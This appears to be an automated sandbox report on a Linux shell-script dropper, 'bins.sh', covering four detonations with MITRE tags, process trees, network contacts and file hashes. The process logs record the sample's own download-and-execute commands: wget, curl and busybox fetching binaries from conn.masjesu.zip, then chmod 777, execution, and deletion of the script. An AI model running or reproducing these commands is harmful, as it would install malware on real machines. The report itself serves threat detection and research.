Malware Analysis Report

2025-05-28 20:28

Sample ID 241125-kxn23ayncv
Target bins.sh
SHA256 cc389826e1c69d374e663bd661f142219337efc77291a8e24d98490ff36d9b1e
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

cc389826e1c69d374e663bd661f142219337efc77291a8e24d98490ff36d9b1e

Threat Level: Shows suspicious behavior

The file bins.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

System Network Configuration Discovery

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 08:58

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 08:58

Reported

2024-11-25 09:01

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

148s

Max time network

131s

Command Line

[/tmp/bins.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-25 08:58

Reported

2024-11-25 09:01

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

27s

Command Line

[/tmp/bins.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 08:58

Reported

2024-11-25 09:01

Platform

debian9-mipsbe-20240418-en

Max time kernel

134s

Max time network

143s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db /usr/bin/wget N/A
File opened for modification /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/bin/chmod

[chmod 777 rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

[./rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/bin/rm

[rm rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/l6UYEbDnZWqFBl7H8QcUiPuhe6ICjSLcyd]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

MD5 3ca8decdb1e52c423c521bfff02ac200
SHA1 8621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256 dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512 b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-25 08:58

Reported

2024-11-25 09:01

Platform

debian9-mipsel-20240226-en

Max time kernel

139s

Max time network

151s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db /usr/bin/wget N/A
File opened for modification /tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/rt3xVPkGk4XANW7qAdaVrKavXPE4dvM5db

MD5 3ca8decdb1e52c423c521bfff02ac200
SHA1 8621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256 dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512 b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a